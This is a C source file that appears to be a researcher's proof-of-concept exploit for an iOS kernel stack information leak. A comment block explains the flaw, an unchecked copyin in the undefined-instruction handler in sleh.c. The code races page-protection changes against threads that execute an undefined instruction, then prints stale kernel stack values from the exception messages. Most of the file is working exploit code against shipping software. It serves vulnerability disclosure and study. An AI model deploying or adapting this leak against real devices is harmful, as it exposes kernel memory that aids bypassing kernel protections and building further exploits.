#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <mach/mach.h>
#include <pthread.h>
#include <sys/mman.h>

/*
iOS kernel stack memory disclosure due to failure to check copyin return value

 Here's a code snippet from sleh.c with the second level exception handler for undefined instruction exceptions:

 static void
 handle_uncategorized(arm_saved_state_t *state, boolean_t instrLen2)
 {
   exception_type_t       exception = EXC_BAD_INSTRUCTION;
   mach_exception_data_type_t   codes[2] = {EXC_ARM_UNDEFINED};
   mach_msg_type_number_t     numcodes = 2;
   uint32_t          instr;   <------ (a)
 
   if (instrLen2) {
     uint16_t  instr16;
     COPYIN(get_saved_state_pc(state), (char *)&instr16, sizeof(instr16));
 
     instr = instr16;
   } else {
     COPYIN(get_saved_state_pc(state), (char *)&instr, sizeof(instr));  <------- (b)
   }
 
 ....
 
  else {
   codes[1] = instr;   <------ (c)
  }
 }
 
 exception_triage(exception, codes, numcodes);  <-------- (d)
 
 
 At (a) the uint32_t instr is declared uninitialized on the stack.
 At (b) the code tries to copyin the bytes of the exception-causing instruction from userspace
   note that the COPYIN macro doesn't itself check the return value of copyin, it just calls it.
 At (c) instr is assigned to codes[1], which at (d) is passed to exception_triage.
 
 that codes array will eventually end up being sent in an exception mach message.
 
 The bug is that we can force copyin to fail by unmapping the page containing the undefined instruction
 while it's being handled. (I tried to do this with XO memory but the kernel seems to be able to copyin that just fine.)
 
 This PoC has an undefined instruction (0xdeadbeef) on its own page and spins up a thread to keep
 switching the protection of that page between VM_PROT_NONE and VM_PROT_READ|VM_PROT_EXECUTE.
 
 We then keep spinning up threads which try to execute that undefined instruction.
 
 If the race windows align the thread executes the undefined instruction but when the sleh code tries to copyin
 the page is unmapped, the copying fails and the exception message we get has stale stack memory.
 
 This PoC just demonstrates that you do get values which aren't 0xdeadbeef in there for the EXC_ARM_UNDEFINED type.
 You'd have to do a bit more fiddling to work out how to get something specific there.
 
 Note that there are lots of other unchecked COPYIN's in sleh.c (eg when userspace tries to access a system register not allowed
 for EL0) and these seem to have the same issue.
 
 tested on iPod Touch 6g running 11.3.1, but looking at the kernelcache it seems to still be there in iOS 12.
*/

kern_return_t catch_exception_raise_state_identity
(
 mach_port_t exception_port,
 mach_port_t thread,
 mach_port_t task,
 exception_type_t exception,
 exception_data_t code,
 mach_msg_type_number_t codeCnt,
 int *flavor,
 thread_state_t old_state,
 mach_msg_type_number_t old_stateCnt,
 thread_state_t new_state,
 mach_msg_type_number_t *new_stateCnt
 )
{
  //printf("catch_exception_raise_state_identity\n");

  
  mach_port_deallocate(mach_task_self(), task);
  mach_port_deallocate(mach_task_self(), thread);
  if (code[0] == 1 && code[1] != 0xdeadbeef) {
    printf("code[0]: %08x\n", code[0]);
    printf("code[1]: %08x\n", code[1]);  // this is stale kernel stack memory!
  }
  // make the thread exit cleanly when it resumes:
  memcpy(new_state, old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));
  _STRUCT_ARM_THREAD_STATE64* new = (_STRUCT_ARM_THREAD_STATE64*)(new_state);
  
  *new_stateCnt = old_stateCnt;
  
  new->__pc = (uint64_t)pthread_exit;
  new->__x[0] = 0;
  
  // let the thread resume and exit
  return KERN_SUCCESS;
}

union max_msg {
  union __RequestUnion__exc_subsystem requests;
  union __ReplyUnion__exc_subsystem replies;
};

extern boolean_t exc_server(mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP);

extern void exec_undef(void);
extern void after_exec_undef(void);

void* do_thread(void* arg) {
  mach_port_t exception_port = (mach_port_t)arg;
  
  kern_return_t err;
  err = thread_set_exception_ports(
                                   mach_thread_self(),
                                   EXC_MASK_ALL,
                                   exception_port,
                                   EXCEPTION_STATE_IDENTITY, // catch_exception_raise_state_identity messages
                                   ARM_THREAD_STATE64);
  
  if (err != KERN_SUCCESS) {
    printf("failed to set exception port\n");
  }
  
  exec_undef();
  
  return NULL;
}

void* region_base = 0;
size_t region_size = 0;

void* mapper_unmapper_func(void* arg) {
  int err;
  for(;;) {
    err = mprotect(region_base, region_size, VM_PROT_NONE);
    if (err != 0) {
      printf("mprotect failed setting VM_PROT_NONE");
    }
    err = mprotect(region_base, region_size, VM_PROT_READ | VM_PROT_EXECUTE);
  }
}

void go() {
  kern_return_t err;
  // need an undefined instruction on it's own code-signed page
  printf("exec_undef: 0x%016llx\n", (void*)exec_undef);
  printf("after_exec_undef: %016llx\n", (void*)after_exec_undef);
  
  // make that page XO
  size_t kernel_page_size = 0;
  host_page_size(mach_host_self(), &kernel_page_size);
  
  region_base = exec_undef;
  region_size = kernel_page_size;
  
  // allocate an exception port
  mach_port_t exc_port = MACH_PORT_NULL;
  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port);
  mach_port_insert_right(mach_task_self(), exc_port, exc_port, MACH_MSG_TYPE_MAKE_SEND);
  
  // spin up a thread to keep mapping and unmapping the undefined instruction:
  pthread_t mapper_unmapper_thread;
  pthread_create(&mapper_unmapper_thread, NULL, mapper_unmapper_func, NULL);
  

  for(;;) {
    // spin up a thread to crash
    pthread_t crasher_thread;
    pthread_create(&crasher_thread, NULL, do_thread, (void*)exc_port);
    
    // receive the exception message, inspect the correct field
    kern_return_t err = mach_msg_server_once(exc_server,
                                             sizeof(union max_msg),
                                             exc_port,
                                             MACH_MSG_TIMEOUT_NONE);
    
    pthread_join(crasher_thread, NULL);
  }
  
}
  
  
  
  
  
  
  
  
  
  
  

